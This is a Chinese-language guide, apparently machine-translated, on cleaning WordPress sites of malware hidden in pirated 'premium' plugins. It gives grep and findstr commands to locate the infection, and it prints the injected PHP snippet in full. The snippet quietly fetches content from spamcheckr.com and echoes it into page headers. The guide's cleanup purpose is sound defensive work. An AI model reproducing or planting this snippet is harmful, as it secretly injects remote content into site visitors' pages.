如果您有 grep(默认在 mac 和许多其他设备上,但不是 pc),您可以在终端中使用有用的小命令检查您的文件夹。对于 pc 使用 findstr 或下载 grep。如果您无法在本地访问这些文件,请下载它们或使用 ssh/telnes
远程访问它们
我使用的 grep 命令是:
grep -nr 'http://spamcheckr.com/l.php' /www/mysite/wp-content
(不要忘记将 /www/mysite/wp-content 更改为您的 wordpress 站点的位置)
将-nr 选项与 grep 结合使用,它将输出代码所在文件夹和文件的确切行。
对于电脑:
findstr /s /i /p "http://spamcheckr.com/l.php" /www/wordpress/wp-content
不幸的是,它可能会告诉您它在第一行,但是当您打开文件时,您会注意到它是一个大约 250 行长的压缩文件。不过没问题。只需使用任何启用了语法高亮的文本编辑器打开它,然后查找以下代码:
if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}
它将是唯一突出显示的代码,而所有其他代码将保持灰色,因为它只是用来欺骗您,实际上并没有做任何事情。然后您可以删除该代码。
您可能还想首先检查是谁添加了该文件,因此只需使用与上面相同的 grep 命令,而是使用您在其中发现恶意代码的文件的名称。因此,如果文件名是includes/settings.php 在命令行中运行如下:
grep -nr 'includes/settings.php' /www/mysite/wp-content
该文件很可能包含在插件根目录或主题functions.php 中的主php 脚本中。
它看起来像这样
包括'includes/settings.php';
如果文件都是垃圾代码,您可以安全地删除该行。我还会浏览该页面,看看是否添加了其他看起来可疑的内容。
您最安全的选择是完全停止使用该插件,但如果您真的需要它,您可以运行一些在线病毒检查程序,或者只是查看该插件以提高安全性。
这些插件通常来自 wplocker/themeok.org 等网站或其他声称免费提供高级插件的网站。底线是,这太好了,令人难以置信,他们想敲诈你,所以要么付钱给他们,要么准备好让他们跟你搞砸。
顺便说一句,它可能还做了其他事情,所以我会采取其他一些安全措施,然后只是修复 youtube hack。